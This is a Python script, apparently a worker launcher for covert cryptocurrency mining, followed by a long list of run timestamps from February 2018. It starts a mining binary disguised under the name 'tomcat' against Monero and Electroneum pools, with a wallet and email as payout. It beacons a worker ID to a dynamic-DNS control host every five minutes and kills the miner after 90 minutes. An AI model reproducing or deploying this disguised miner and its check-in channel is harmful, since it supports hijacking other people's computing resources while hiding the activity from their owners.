import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:46:04.711761
#2018-02-17 17:37:05.110521
#2018-02-17 19:26:01.599418
#2018-02-17 21:15:04.203362
#2018-02-17 22:59:04.189941
#2018-02-18 00:47:01.711157
#2018-02-18 02:34:08.351895
#2018-02-18 04:21:06.280783
#2018-02-18 06:13:07.171687
#2018-02-18 08:04:04.439493
#2018-02-18 09:52:05.783497
#2018-02-18 11:39:07.242059
#2018-02-18 13:24:01.578878
#2018-02-18 15:14:03.857015
#2018-02-18 17:02:06.538968
#2018-02-18 18:48:05.176125
#2018-02-18 20:36:07.145444
#2018-02-18 22:22:01.816983
#2018-02-19 00:11:06.664272
#2018-02-19 01:57:03.505017
#2018-02-19 03:43:07.368637
#2018-02-19 05:28:03.121174
#2018-02-19 07:16:01.512921
#2018-02-19 09:04:07.039279
#2018-02-19 10:51:06.675048
#2018-02-19 12:39:01.359606
#2018-02-19 14:26:06.968204
#2018-02-19 16:14:04.018568
#2018-02-19 18:02:06.851462
#2018-02-19 19:48:09.462289
#2018-02-19 21:35:01.564669
#2018-02-19 23:21:01.603086
#2018-02-20 01:07:03.797403
#2018-02-20 02:55:06.284220
#2018-02-20 04:43:06.937392
#2018-02-20 06:27:05.945181
#2018-02-20 08:11:07.873820
#2018-02-20 09:56:06.294558
#2018-02-20 11:39:01.941211
#2018-02-20 13:25:09.478207
#2018-02-20 15:10:11.982723
#2018-02-20 16:54:07.469858
#2018-02-20 18:42:07.358719
#2018-02-20 20:32:03.691417
#2018-02-20 22:17:01.901053
#2018-02-20 23:58:04.921913
#2018-02-21 01:43:04.437138
#2018-02-21 03:30:09.646148
#2018-02-21 05:18:02.102731
#2018-02-21 07:06:05.033434
#2018-02-21 08:52:06.766974
#2018-02-21 10:40:07.006422
#2018-02-21 12:29:04.324631
#2018-02-21 14:15:01.670902
#2018-02-21 16:02:05.092317
#2018-02-21 17:53:08.048626
#2018-02-21 19:39:05.327892
#2018-02-21 21:26:06.950039
#2018-02-21 23:13:05.561213
#2018-02-22 01:02:03.941403
#2018-02-22 02:49:05.454372
#2018-02-22 04:36:01.923173
#2018-02-22 06:20:09.516555
#2018-02-22 08:08:02.053879
#2018-02-22 09:56:01.660249
#2018-02-22 11:41:06.348986
#2018-02-22 13:27:07.094578
#2018-02-22 15:16:07.506861
#2018-02-22 17:09:04.375363
#2018-02-22 18:55:07.765413
#2018-02-22 20:47:04.388957
#2018-02-22 22:32:08.221156
#2018-02-23 00:18:02.219622
#2018-02-23 02:08:01.196760
#2018-02-23 03:55:08.083877
#2018-02-23 05:31:07.148514
#2018-02-23 07:16:05.731925
#2018-02-23 09:21:06.042703
#2018-02-23 11:27:07.310984
#2018-02-23 13:16:07.197494
#2018-02-23 15:02:02.202245
#2018-02-23 16:49:09.654340
#2018-02-23 18:36:06.393148
#2018-02-23 20:43:07.564623
#2018-02-23 22:28:07.856936
#2018-02-24 00:14:01.964908
#2018-02-24 02:06:05.863460
#2018-02-24 03:56:04.196664
#2018-02-24 05:42:08.660758
#2018-02-24 07:33:01.964180
#2018-02-24 09:19:06.881975
#2018-02-24 11:08:06.455701
#2018-02-24 12:56:07.478228
#2018-02-24 14:43:07.394152
#2018-02-24 16:36:07.962296
#2018-02-24 18:25:06.114196
#2018-02-24 20:12:06.867998
#2018-02-24 21:58:02.171453
#2018-02-25 00:58:01.619559
#2018-02-25 03:55:01.288673
#2018-02-25 06:40:01.638230
#2018-02-25 11:36:07.604921
#2018-02-25 13:52:01.956537
#2018-02-25 15:26:01.864377